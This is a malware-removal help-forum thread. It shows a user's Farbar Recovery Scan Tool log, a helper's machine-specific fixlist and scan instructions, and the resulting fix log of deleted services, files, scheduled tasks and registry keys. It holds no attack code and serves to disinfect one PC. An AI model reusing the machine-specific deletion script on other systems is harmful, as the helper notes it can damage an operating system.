Description: machine-defaultLocalActivation{C2F03A33-21F5-47FA-B4BB-156362A2F239}{316CDED5-E4AE-4B15-9113-7055D84DCC97}RoNiN-LaptopRoNiNS-1-5-21-470165136-1162808608-978993673-1001LocalHost (Using LRPC)Microsoft.Windows.Cortana_1.4.8.176_neutral_neutral_cw5n1h2txyewyS-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742
 
Error: (04/09/2016 04:21:26 PM) (Source: volmgr) (EventID: 46) (User: )
Description: Crash dump initialization failed!
 
Error: (04/09/2016 04:21:22 PM) (Source: sptd) (EventID: 4) (User: )
Description: Driver detected an internal error in its data structures for .
 
Error: (04/09/2016 04:20:23 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Access_Session1 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (04/09/2016 04:20:23 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Storage_Session1 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
 
CodeIntegrity:
===================================
  Date: 2016-03-11 18:17:52.048
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 18:17:51.703
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 18:17:51.394
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 18:17:51.129
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 18:17:50.762
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 03:33:01.939
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 03:33:01.784
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 03:31:55.925
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 03:31:55.802
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 00:41:18.766
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i5 CPU M 450 @ 2.40GHz
Percentage of memory in use: 60%
Total physical RAM: 3885.5 MB
Available physical RAM: 1542.19 MB
Total Virtual: 3885.5 MB
Available Virtual: 579.16 MB
 
==================== Drives ================================
 
Drive c: (OS_Install) (Fixed) (Total:273.4 GB) (Free:2.35 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: (Data) (Fixed) (Total:180.26 GB) (Free:117.9 GB) NTFS
Drive w: (BIOS_RVY) (Fixed) (Total:12 GB) (Free:3.31 GB) NTFS ==>[system with boot components (obtained from drive)]
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 9C73A223)
Partition 1: (Not Active) - (Size=12 GB) - (Type=27)
Partition 2: (Active) - (Size=100 MB) - (Type=27)
Partition 3: (Not Active) - (Size=273.4 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=180.3 GB) - (Type=07 NTFS)
 
==================== End of Addition.txt ============================
 


#8 Jo*


  • Malware Response Team
  • 3,425 posts
  • Gender:Male
  • Location:Germany

Posted 12 April 2016 - 03:43 AM

Hello,

Toffee is not available, so I will help you...
 

***


Copy FRST / FRST64.exe to your desktop!

Open Notepad. Please copy the contents of the code box below. To do this, highlight the contents of the box and right-click on it. Paste this into the open Notepad window.
Save it in the same location as FRST / FRST64 (usually your desktop) as fixlist.txt



start
CreateRestorePoint:
CloseProcesses:
GroupPolicyScripts-x32\User: Restriction <======= ATTENTION
SearchScopes: HKLM -> OldSearch URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSITDF&pc=MAMI&src=IE-SearchBox 
SearchScopes: HKLM-x32 -> {DF74C2BD-9885-45D2-AC3E-F2865A90DEAB} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSITDF&pc=MAMI&src=IE-SearchBox 
SearchScopes: HKU\S-1-5-21-470165136-1162808608-978993673-1001 -> {0F462454-2A7D-48CE-B2B5-ECD4B55B6026} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1 
SearchScopes: HKU\S-1-5-21-470165136-1162808608-978993673-1001 -> {C9D867C8-1E65-4F71-970A-C677CAECFCC3} URL = hxxps://search.yahoo.com/search?p={searchTerms}&fr=yset_ie_syc_oracle&type=orcl_default 
SearchScopes: HKU\S-1-5-21-470165136-1162808608-978993673-1001 -> {DF74C2BD-9885-45D2-AC3E-F2865A90DEAB} URL = 
U3 idsvc; no ImagePath 
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X] 
U3 wpcsvc; no ImagePath
C:\ProgramData\WceNM3o.dat 
C:\Users\RoNiN\autoplaylist.dat 
C:\Users\RoNiN\cddbcontrol.dll 
C:\Users\RoNiN\cddblink.dll 
C:\Users\RoNiN\cddbmusicid.dll 
C:\Users\RoNiN\convert.exe 
C:\Users\RoNiN\dbghelp.dll 
C:\Users\RoNiN\dunzip32.dll 
C:\Users\RoNiN\fixrjb.exe 
C:\Users\RoNiN\hxaudiodevicehook.dll 
C:\Users\RoNiN\ierjplug.dll 
C:\Users\RoNiN\keys.dat 
C:\Users\RoNiN\mc_enc_h263.dll 
C:\Users\RoNiN\mediainfo.dll 
C:\Users\RoNiN\mmcdda32.dll 
C:\Users\RoNiN\rdsf3260.dll 
C:\Users\RoNiN\realcleaner.exe 
C:\Users\RoNiN\realconverter.exe 
C:\Users\RoNiN\realjbox.exe 
C:\Users\RoNiN\realplay.exe 
C:\Users\RoNiN\realshare.exe 
C:\Users\RoNiN\realtrimmer.exe 
C:\Users\RoNiN\rjbres.dll 
C:\Users\RoNiN\rjdlg.dll 
C:\Users\RoNiN\rjprog.dll 
C:\Users\RoNiN\rjwmapln.dll 
C:\Users\RoNiN\rndevicedbbuilder.exe 
C:\Users\RoNiN\rpau3260.dll 
C:\Users\RoNiN\rphelperapp.exe 
C:\Users\RoNiN\rpplugprot.dll 
C:\Users\RoNiN\rpshell.dll 
C:\Users\RoNiN\rpshellextension.dll 
C:\Users\RoNiN\rpshellsearch.dll 
C:\Users\RoNiN\rpwa3260.dll 
C:\Users\RoNiN\strs23.dat 
C:\Users\RoNiN\strs26.dat 
C:\Users\RoNiN\tnetdtct.dll 
C:\Users\RoNiN\tpasdk.dll 
C:\Users\RoNiN\tsasdk.dll 
C:\Users\RoNiN\wmdmhelper.dll
C:\Users\RoNiN\AppData\Local\Temp\392590059.exe 
C:\Users\RoNiN\AppData\Local\Temp\523578965.exe 
C:\Users\RoNiN\AppData\Local\Temp\ARCompanionForSession1.exe 
C:\Users\RoNiN\AppData\Local\Temp\dsHostCheckerSetup.exe 
C:\Users\RoNiN\AppData\Local\Temp\Execute2App.exe 
C:\Users\RoNiN\AppData\Local\Temp\File_Downloader.exe 
C:\Users\RoNiN\AppData\Local\Temp\i4jdel0.exe 
C:\Users\RoNiN\AppData\Local\Temp\io1.exe 
C:\Users\RoNiN\AppData\Local\Temp\jre-8u73-windows-au.exe 
C:\Users\RoNiN\AppData\Local\Temp\JuniperSetupClientInstaller.exe 
C:\Users\RoNiN\AppData\Local\Temp\libeay32.dll 
C:\Users\RoNiN\AppData\Local\Temp\lowproc.exe 
C:\Users\RoNiN\AppData\Local\Temp\msvcp90.dll 
C:\Users\RoNiN\AppData\Local\Temp\msvcr120.dll 
C:\Users\RoNiN\AppData\Local\Temp\msvcr90.dll 
C:\Users\RoNiN\AppData\Local\Temp\sqlite3.dll 
C:\Users\RoNiN\AppData\Local\Temp\stubhelper.dll
Task: {102A620C-F30C-4549-9641-182161BCECEB} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION 
Task: {1BAAE6FE-C34D-4631-9BB2-16D444231725} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION 
Task: {323B5AD8-0CF3-498F-B85C-6889DE79CF89} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION 
Task: {431A8418-553F-414C-B938-84B7D6C11432} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION 
Task: {564B49C2-B6F5-4F1E-97F5-C10111DA8EE4} - \{99331EF5-343D-47FD-B006-40F37A0D5E9D} -> No File <==== ATTENTION 
Task: {5AE1ACA2-BEE0-4554-BD58-6D5A059FC8AD} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION 
Task: {5AF597F4-43A4-4292-9389-1D19188D828F} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION 
Task: {5B6A393D-57E5-4198-BD7E-00E0B9EF3F77} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION 
Task: {5BD1D165-089F-40BA-8D52-B90C85B1BB0D} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION 
Task: {6D890055-866E-4872-979D-B8AB3884F1DC} - System32\Tasks\WMMAWVKOLXONAOYC => C:\ProgramData\Service1291\Service1291.exe <==== ATTENTION 
Task: {874B492C-C094-4938-A93E-0F5141822989} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION 
Task: {BE0F7D0B-3323-406F-AAEF-1A12388A1C9C} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION 
Task: {D3ACB7DB-7815-42A9-A39F-8D89E1EDF573} - System32\Tasks\Pritc => C:\Users\RoNiN\AppData\Local\Temp\is-TIN56.tmp\print.exe <==== ATTENTION 
Task: {D92D97F2-2EDF-4800-82E5-E726F16D0395} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION 
Task: {E86953B2-7A47-4920-B975-308AAEEA66E9} - System32\Tasks\BJZJKCUBLH1 => C:\ProgramData\FlashBeat\FlashBeat.exe <==== ATTENTION 
Task: {FC48FBF3-30B8-44A9-9A0B-C568A2FC47CD} - \LuckyTab -> No File <==== ATTENTION 
Task: C:\WINDOWS\Tasks\BJZJKCUBLH1.job => C:\ProgramData\FlashBeat\FlashBeat.exe <==== ATTENTION 
Task: C:\WINDOWS\Tasks\WMMAWVKOLXONAOYC.job => C:\ProgramData\Service1291\Service1291.exe <==== ATTENTION
C:\ProgramData\Service1291
EmptyTemp:
end


NOTICE: This script was written specifically for this user, for use on that particular machine.
Running this on another machine may cause damage to your operating system.


Run FRST / FRST64 again like we did before, but this time press the Fix button just once and wait.
The tool will make a log (Fixlog.txt); please post it in your reply.


***


FRST / FRST64: run it again.
  • Right-click FRST / FRST64, then click "Run as administrator" (XP users: click Run after receipt of the Windows Security Warning - Open File).
  • When the tool opens, click Yes to disclaimer.
  • Put a check into the box next to Addition.txt and press the Scan button.
  • When finished, it will produce a log called FRST.txt in the same directory the tool was run from.
  • Please copy and paste the log in your next reply.

***


Please download Malwarebytes Anti-Rootkit and save it to your desktop.
  • Be sure to print out and follow the instructions provided on that same page.
  • Caution: This is a beta version so please be sure to read the disclaimer and back up all your data before using.
  • Double click on downloaded file. OK self extracting prompt.
  • MBAR will start. Click "Next" in the introduction screen to continue.
  • Click "Update" in the following screen to obtain the latest malware definitions.
  • Once the update is complete select "Next" and click "Scan".
With some infections, you may see two message boxes.
  • 'Could not load protection driver'. Click 'OK'.
  • 'Could not load DDA driver'. Click 'Yes' to this message, to allow the driver to load after a restart. Allow the computer to restart. Continue with the rest of these instructions.
  • If malware is found - do not press the Clean up button, please go to the MBAR folder and then copy/paste the contents of the MBAR-log-***.txt file to your next reply.
  • If there is no malware found, please let me know as well.

Graduate of the WTT Classroom
Cheers,
Jo
If I have been helping you, and I have not replied to your latest post in 36 hours please send me a PM.


#9 Ronins8

  • Topic Starter

  • Members
  • 22 posts

Posted 14 April 2016 - 08:10 PM

Hi Jo! Thanks for your help. I have placed all the logs below. When I ran the MBAR scan, it came back that no malware was found :)

 

Fix result of Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
Ran by RoNiN (2016-04-13 20:21:03) Run:4
Running from C:\virus
Loaded Profiles: RoNiN & postgres (Available Profiles: RoNiN & postgres)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
start
CreateRestorePoint:
CloseProcesses:
GroupPolicyScripts-x32\User: Restriction <======= ATTENTION
SearchScopes: HKLM -> OldSearch URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSITDF&pc=MAMI&src=IE-SearchBox 
SearchScopes: HKLM-x32 -> {DF74C2BD-9885-45D2-AC3E-F2865A90DEAB} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSITDF&pc=MAMI&src=IE-SearchBox 
SearchScopes: HKU\S-1-5-21-470165136-1162808608-978993673-1001 -> {0F462454-2A7D-48CE-B2B5-ECD4B55B6026} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1 
SearchScopes: HKU\S-1-5-21-470165136-1162808608-978993673-1001 -> {C9D867C8-1E65-4F71-970A-C677CAECFCC3} URL = hxxps://search.yahoo.com/search?p={searchTerms}&fr=yset_ie_syc_oracle&type=orcl_default 
SearchScopes: HKU\S-1-5-21-470165136-1162808608-978993673-1001 -> {DF74C2BD-9885-45D2-AC3E-F2865A90DEAB} URL = 
U3 idsvc; no ImagePath 
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X] 
U3 wpcsvc; no ImagePath
C:\ProgramData\WceNM3o.dat 
C:\Users\RoNiN\autoplaylist.dat 
C:\Users\RoNiN\cddbcontrol.dll 
C:\Users\RoNiN\cddblink.dll 
C:\Users\RoNiN\cddbmusicid.dll 
C:\Users\RoNiN\convert.exe 
C:\Users\RoNiN\dbghelp.dll 
C:\Users\RoNiN\dunzip32.dll 
C:\Users\RoNiN\fixrjb.exe 
C:\Users\RoNiN\hxaudiodevicehook.dll 
C:\Users\RoNiN\ierjplug.dll 
C:\Users\RoNiN\keys.dat 
C:\Users\RoNiN\mc_enc_h263.dll 
C:\Users\RoNiN\mediainfo.dll 
C:\Users\RoNiN\mmcdda32.dll 
C:\Users\RoNiN\rdsf3260.dll 
C:\Users\RoNiN\realcleaner.exe 
C:\Users\RoNiN\realconverter.exe 
C:\Users\RoNiN\realjbox.exe 
C:\Users\RoNiN\realplay.exe 
C:\Users\RoNiN\realshare.exe 
C:\Users\RoNiN\realtrimmer.exe 
C:\Users\RoNiN\rjbres.dll 
C:\Users\RoNiN\rjdlg.dll 
C:\Users\RoNiN\rjprog.dll 
C:\Users\RoNiN\rjwmapln.dll 
C:\Users\RoNiN\rndevicedbbuilder.exe 
C:\Users\RoNiN\rpau3260.dll 
C:\Users\RoNiN\rphelperapp.exe 
C:\Users\RoNiN\rpplugprot.dll 
C:\Users\RoNiN\rpshell.dll 
C:\Users\RoNiN\rpshellextension.dll 
C:\Users\RoNiN\rpshellsearch.dll 
C:\Users\RoNiN\rpwa3260.dll 
C:\Users\RoNiN\strs23.dat 
C:\Users\RoNiN\strs26.dat 
C:\Users\RoNiN\tnetdtct.dll 
C:\Users\RoNiN\tpasdk.dll 
C:\Users\RoNiN\tsasdk.dll 
C:\Users\RoNiN\wmdmhelper.dll
C:\Users\RoNiN\AppData\Local\Temp\392590059.exe 
C:\Users\RoNiN\AppData\Local\Temp\523578965.exe 
C:\Users\RoNiN\AppData\Local\Temp\ARCompanionForSession1.exe 
C:\Users\RoNiN\AppData\Local\Temp\dsHostCheckerSetup.exe 
C:\Users\RoNiN\AppData\Local\Temp\Execute2App.exe 
C:\Users\RoNiN\AppData\Local\Temp\File_Downloader.exe 
C:\Users\RoNiN\AppData\Local\Temp\i4jdel0.exe 
C:\Users\RoNiN\AppData\Local\Temp\io1.exe 
C:\Users\RoNiN\AppData\Local\Temp\jre-8u73-windows-au.exe 
C:\Users\RoNiN\AppData\Local\Temp\JuniperSetupClientInstaller.exe 
C:\Users\RoNiN\AppData\Local\Temp\libeay32.dll 
C:\Users\RoNiN\AppData\Local\Temp\lowproc.exe 
C:\Users\RoNiN\AppData\Local\Temp\msvcp90.dll 
C:\Users\RoNiN\AppData\Local\Temp\msvcr120.dll 
C:\Users\RoNiN\AppData\Local\Temp\msvcr90.dll 
C:\Users\RoNiN\AppData\Local\Temp\sqlite3.dll 
C:\Users\RoNiN\AppData\Local\Temp\stubhelper.dll
Task: {102A620C-F30C-4549-9641-182161BCECEB} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION 
Task: {1BAAE6FE-C34D-4631-9BB2-16D444231725} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION 
Task: {323B5AD8-0CF3-498F-B85C-6889DE79CF89} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION 
Task: {431A8418-553F-414C-B938-84B7D6C11432} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION 
Task: {564B49C2-B6F5-4F1E-97F5-C10111DA8EE4} - \{99331EF5-343D-47FD-B006-40F37A0D5E9D} -> No File <==== ATTENTION 
Task: {5AE1ACA2-BEE0-4554-BD58-6D5A059FC8AD} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION 
Task: {5AF597F4-43A4-4292-9389-1D19188D828F} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION 
Task: {5B6A393D-57E5-4198-BD7E-00E0B9EF3F77} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION 
Task: {5BD1D165-089F-40BA-8D52-B90C85B1BB0D} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION 
Task: {6D890055-866E-4872-979D-B8AB3884F1DC} - System32\Tasks\WMMAWVKOLXONAOYC => C:\ProgramData\Service1291\Service1291.exe <==== ATTENTION 
Task: {874B492C-C094-4938-A93E-0F5141822989} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION 
Task: {BE0F7D0B-3323-406F-AAEF-1A12388A1C9C} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION 
Task: {D3ACB7DB-7815-42A9-A39F-8D89E1EDF573} - System32\Tasks\Pritc => C:\Users\RoNiN\AppData\Local\Temp\is-TIN56.tmp\print.exe <==== ATTENTION 
Task: {D92D97F2-2EDF-4800-82E5-E726F16D0395} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION 
Task: {E86953B2-7A47-4920-B975-308AAEEA66E9} - System32\Tasks\BJZJKCUBLH1 => C:\ProgramData\FlashBeat\FlashBeat.exe <==== ATTENTION 
Task: {FC48FBF3-30B8-44A9-9A0B-C568A2FC47CD} - \LuckyTab -> No File <==== ATTENTION 
Task: C:\WINDOWS\Tasks\BJZJKCUBLH1.job => C:\ProgramData\FlashBeat\FlashBeat.exe <==== ATTENTION 
Task: C:\WINDOWS\Tasks\WMMAWVKOLXONAOYC.job => C:\ProgramData\Service1291\Service1291.exe <==== ATTENTION
C:\ProgramData\Service1291
EmptyTemp:
end
*****************
 
Restore point was successfully created.
Processes closed successfully.
C:\WINDOWS\SysWOW64\GroupPolicy\User => moved successfully
C:\WINDOWS\SysWOW64\GroupPolicy\GPT.ini => moved successfully
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\OldSearch" => key removed successfully
HKCR\CLSID\OldSearch => key not found. 
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{DF74C2BD-9885-45D2-AC3E-F2865A90DEAB}" => key removed successfully
HKCR\Wow6432Node\CLSID\{DF74C2BD-9885-45D2-AC3E-F2865A90DEAB} => key not found. 
"HKU\S-1-5-21-470165136-1162808608-978993673-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0F462454-2A7D-48CE-B2B5-ECD4B55B6026}" => key removed successfully
HKCR\CLSID\{0F462454-2A7D-48CE-B2B5-ECD4B55B6026} => key not found. 
"HKU\S-1-5-21-470165136-1162808608-978993673-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{C9D867C8-1E65-4F71-970A-C677CAECFCC3}" => key removed successfully
HKCR\CLSID\{C9D867C8-1E65-4F71-970A-C677CAECFCC3} => key not found. 
"HKU\S-1-5-21-470165136-1162808608-978993673-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{DF74C2BD-9885-45D2-AC3E-F2865A90DEAB}" => key removed successfully
HKCR\CLSID\{DF74C2BD-9885-45D2-AC3E-F2865A90DEAB} => key not found. 
idsvc => service removed successfully
wfpcapture => service removed successfully
wpcsvc => service removed successfully
C:\ProgramData\WceNM3o.dat => moved successfully
C:\Users\RoNiN\autoplaylist.dat => moved successfully
C:\Users\RoNiN\cddbcontrol.dll => moved successfully
C:\Users\RoNiN\cddblink.dll => moved successfully
C:\Users\RoNiN\cddbmusicid.dll => moved successfully
C:\Users\RoNiN\convert.exe => moved successfully
C:\Users\RoNiN\dbghelp.dll => moved successfully
C:\Users\RoNiN\dunzip32.dll => moved successfully
C:\Users\RoNiN\fixrjb.exe => moved successfully
C:\Users\RoNiN\hxaudiodevicehook.dll => moved successfully
C:\Users\RoNiN\ierjplug.dll => moved successfully
C:\Users\RoNiN\keys.dat => moved successfully
C:\Users\RoNiN\mc_enc_h263.dll => moved successfully
C:\Users\RoNiN\mediainfo.dll => moved successfully
C:\Users\RoNiN\mmcdda32.dll => moved successfully
C:\Users\RoNiN\rdsf3260.dll => moved successfully
C:\Users\RoNiN\realcleaner.exe => moved successfully
C:\Users\RoNiN\realconverter.exe => moved successfully
C:\Users\RoNiN\realjbox.exe => moved successfully
C:\Users\RoNiN\realplay.exe => moved successfully
C:\Users\RoNiN\realshare.exe => moved successfully
C:\Users\RoNiN\realtrimmer.exe => moved successfully
C:\Users\RoNiN\rjbres.dll => moved successfully
C:\Users\RoNiN\rjdlg.dll => moved successfully
C:\Users\RoNiN\rjprog.dll => moved successfully
C:\Users\RoNiN\rjwmapln.dll => moved successfully
C:\Users\RoNiN\rndevicedbbuilder.exe => moved successfully
C:\Users\RoNiN\rpau3260.dll => moved successfully
C:\Users\RoNiN\rphelperapp.exe => moved successfully
C:\Users\RoNiN\rpplugprot.dll => moved successfully
C:\Users\RoNiN\rpshell.dll => moved successfully
C:\Users\RoNiN\rpshellextension.dll => moved successfully
C:\Users\RoNiN\rpshellsearch.dll => moved successfully
C:\Users\RoNiN\rpwa3260.dll => moved successfully
C:\Users\RoNiN\strs23.dat => moved successfully
C:\Users\RoNiN\strs26.dat => moved successfully
C:\Users\RoNiN\tnetdtct.dll => moved successfully
C:\Users\RoNiN\tpasdk.dll => moved successfully
C:\Users\RoNiN\tsasdk.dll => moved successfully
C:\Users\RoNiN\wmdmhelper.dll => moved successfully
C:\Users\RoNiN\AppData\Local\Temp\392590059.exe => moved successfully
C:\Users\RoNiN\AppData\Local\Temp\523578965.exe => moved successfully
C:\Users\RoNiN\AppData\Local\Temp\ARCompanionForSession1.exe => moved successfully
C:\Users\RoNiN\AppData\Local\Temp\dsHostCheckerSetup.exe => moved successfully
C:\Users\RoNiN\AppData\Local\Temp\Execute2App.exe => moved successfully
C:\Users\RoNiN\AppData\Local\Temp\File_Downloader.exe => moved successfully
C:\Users\RoNiN\AppData\Local\Temp\i4jdel0.exe => moved successfully
C:\Users\RoNiN\AppData\Local\Temp\io1.exe => moved successfully
C:\Users\RoNiN\AppData\Local\Temp\jre-8u73-windows-au.exe => moved successfully
C:\Users\RoNiN\AppData\Local\Temp\JuniperSetupClientInstaller.exe => moved successfully
C:\Users\RoNiN\AppData\Local\Temp\libeay32.dll => moved successfully
C:\Users\RoNiN\AppData\Local\Temp\lowproc.exe => moved successfully
C:\Users\RoNiN\AppData\Local\Temp\msvcp90.dll => moved successfully
C:\Users\RoNiN\AppData\Local\Temp\msvcr120.dll => moved successfully
C:\Users\RoNiN\AppData\Local\Temp\msvcr90.dll => moved successfully
C:\Users\RoNiN\AppData\Local\Temp\sqlite3.dll => moved successfully
C:\Users\RoNiN\AppData\Local\Temp\stubhelper.dll => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{102A620C-F30C-4549-9641-182161BCECEB}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{102A620C-F30C-4549-9641-182161BCECEB}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1BAAE6FE-C34D-4631-9BB2-16D444231725}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1BAAE6FE-C34D-4631-9BB2-16D444231725}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{323B5AD8-0CF3-498F-B85C-6889DE79CF89}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{323B5AD8-0CF3-498F-B85C-6889DE79CF89}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Time-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{431A8418-553F-414C-B938-84B7D6C11432}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{431A8418-553F-414C-B938-84B7D6C11432}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{564B49C2-B6F5-4F1E-97F5-C10111DA8EE4}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{564B49C2-B6F5-4F1E-97F5-C10111DA8EE4}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{99331EF5-343D-47FD-B006-40F37A0D5E9D}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{5AE1ACA2-BEE0-4554-BD58-6D5A059FC8AD}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5AE1ACA2-BEE0-4554-BD58-6D5A059FC8AD}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{5AF597F4-43A4-4292-9389-1D19188D828F}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5AF597F4-43A4-4292-9389-1D19188D828F}" => key removed successfully
